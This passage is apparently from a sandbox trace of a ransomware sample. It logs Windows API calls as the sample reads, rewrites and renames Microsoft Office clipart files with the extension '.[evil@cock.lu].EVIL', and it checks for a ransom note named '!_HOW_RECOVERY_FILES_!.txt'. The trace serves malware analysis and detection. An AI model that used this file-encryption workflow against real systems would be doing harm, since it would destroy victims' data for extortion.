lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2606, lpOverlapped=0x0) returned 1 [0127.614] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.614] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.614] _errno () returned 0x84b1160840 [0127.614] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.614] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2620, lpOverlapped=0x0) returned 1 [0127.614] CloseHandle (hObject=0x1a8) returned 1 [0127.615] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.615] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.615] __uncaught_exception () returned 0x84b1160800 [0127.615] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.615] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086384.wmf.[evil@cock.lu].evil")) returned 1 [0127.616] ??_V@YAXPEAX@Z () returned 0x1 [0127.618] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086384.WMF", dwFileAttributes=0x200) returned 0 [0127.618] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.618] wcsstr (_Str="J0086420.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.618] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 69 [0127.618] wcscmp (_String1="J0086420.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.618] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086420.WMF") returned 0x0 [0127.618] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF") returned 0x45 [0127.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.621] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x257c, lpOverlapped=0x0) returned 1 [0127.628] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.628] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.628] _errno () returned 0x84b1160840 [0127.628] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.628] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2580, lpOverlapped=0x0) returned 1 [0127.628] CloseHandle (hObject=0x1a8) returned 1 [0127.628] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.628] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.628] __uncaught_exception () returned 0x84b1160800 [0127.628] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.628] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086420.wmf.[evil@cock.lu].evil")) returned 1 [0127.629] ??_V@YAXPEAX@Z () returned 0x1 [0127.632] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086420.WMF", dwFileAttributes=0x200) returned 0 [0127.632] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.632] wcsstr (_Str="J0086424.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.632] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 69 [0127.632] wcscmp (_String1="J0086424.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.632] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086424.WMF") returned 0x0 [0127.632] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF") returned 0x45 [0127.632] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.634] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4278, lpOverlapped=0x0) returned 1 [0127.645] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.645] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.645] _errno () returned 0x84b1160840 [0127.646] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.646] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4280, lpOverlapped=0x0) returned 1 [0127.646] CloseHandle (hObject=0x1a8) returned 1 [0127.646] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.646] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.646] __uncaught_exception () returned 0x84b1160800 [0127.646] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.647] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086424.wmf.[evil@cock.lu].evil")) returned 1 [0127.647] ??_V@YAXPEAX@Z () returned 0x1 [0127.650] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086424.WMF", dwFileAttributes=0x200) returned 0 [0127.650] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.650] wcsstr (_Str="J0086426.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.650] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 69 [0127.650] wcscmp (_String1="J0086426.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.650] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086426.WMF") returned 0x0 [0127.650] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF") returned 0x45 [0127.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.652] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5516, lpOverlapped=0x0) returned 1 [0127.654] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.654] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.654] _errno () returned 0x84b1160840 [0127.654] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.655] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x5520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5520, lpOverlapped=0x0) returned 1 [0127.655] CloseHandle (hObject=0x1a8) returned 1 [0127.655] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.655] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.655] __uncaught_exception () returned 0x84b1160800 [0127.655] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.655] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf.[evil@cock.lu].evil")) returned 1 [0127.656] ??_V@YAXPEAX@Z () returned 0x1 [0127.659] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF", dwFileAttributes=0x200) returned 0 [0127.659] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.659] wcsstr (_Str="J0086428.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.659] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 69 [0127.659] wcscmp (_String1="J0086428.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.659] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086428.WMF") returned 0x0 [0127.659] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF") returned 0x45 [0127.659] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.661] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8a12, lpOverlapped=0x0) returned 1 [0127.664] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.664] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.664] _errno () returned 0x84b1160840 [0127.664] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.664] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8a20, lpOverlapped=0x0) returned 1 [0127.664] CloseHandle (hObject=0x1a8) returned 1 [0127.664] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.665] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.665] __uncaught_exception () returned 0x84b1160800 [0127.665] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.672] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086428.wmf.[evil@cock.lu].evil")) returned 1 [0127.672] ??_V@YAXPEAX@Z () returned 0x1 [0127.675] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086428.WMF", dwFileAttributes=0x200) returned 0 [0127.675] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.675] wcsstr (_Str="J0086432.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.675] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 69 [0127.675] wcscmp (_String1="J0086432.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.675] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086432.WMF") returned 0x0 [0127.675] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF") returned 0x45 [0127.675] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.677] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x829a, lpOverlapped=0x0) returned 1 [0127.694] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.694] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.694] _errno () returned 0x84b1160840 [0127.694] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.694] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x82a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x82a0, lpOverlapped=0x0) returned 1 [0127.694] CloseHandle (hObject=0x1a8) returned 1 [0127.695] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.695] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.695] __uncaught_exception () returned 0x84b1160800 [0127.695] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.695] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086432.wmf.[evil@cock.lu].evil")) returned 1 [0127.763] ??_V@YAXPEAX@Z () returned 0x1 [0127.766] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086432.WMF", dwFileAttributes=0x200) returned 0 [0127.766] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.766] wcsstr (_Str="J0086478.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.766] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 69 [0127.766] wcscmp (_String1="J0086478.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.766] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0086478.WMF") returned 0x0 [0127.767] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF") returned 0x45 [0127.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.769] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x375e, lpOverlapped=0x0) returned 1 [0127.797] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.797] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.798] _errno () returned 0x84b1160840 [0127.798] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.798] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3760, lpOverlapped=0x0) returned 1 [0127.798] CloseHandle (hObject=0x1a8) returned 1 [0127.798] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.798] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.798] __uncaught_exception () returned 0x84b1160800 [0127.798] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.798] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086478.wmf.[evil@cock.lu].evil")) returned 1 [0127.818] ??_V@YAXPEAX@Z () returned 0x1 [0127.820] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086478.WMF", dwFileAttributes=0x200) returned 0 [0127.820] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.820] wcsstr (_Str="J0089945.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.820] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 69 [0127.820] wcscmp (_String1="J0089945.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.820] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0089945.WMF") returned 0x0 [0127.820] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF") returned 0x45 [0127.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.823] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4dba, lpOverlapped=0x0) returned 1 [0127.840] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.840] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.840] _errno () returned 0x84b1160840 [0127.840] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.840] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4dc0, lpOverlapped=0x0) returned 1 [0127.840] CloseHandle (hObject=0x1a8) returned 1 [0127.840] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0127.841] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0127.841] __uncaught_exception () returned 0x84b1160800 [0127.841] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0127.841] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf.[evil@cock.lu].evil")) returned 1 [0127.842] ??_V@YAXPEAX@Z () returned 0x1 [0127.844] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF", dwFileAttributes=0x200) returned 0 [0127.845] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0127.845] wcsstr (_Str="J0089992.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0127.845] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 69 [0127.845] wcscmp (_String1="J0089992.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0127.845] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0089992.WMF") returned 0x0 [0127.845] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF") returned 0x45 [0127.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0127.847] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d40, lpOverlapped=0x0) returned 1 [0127.857] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.857] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0127.857] _errno () returned 0x84b1160840 [0127.857] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.857] WriteFile (in: 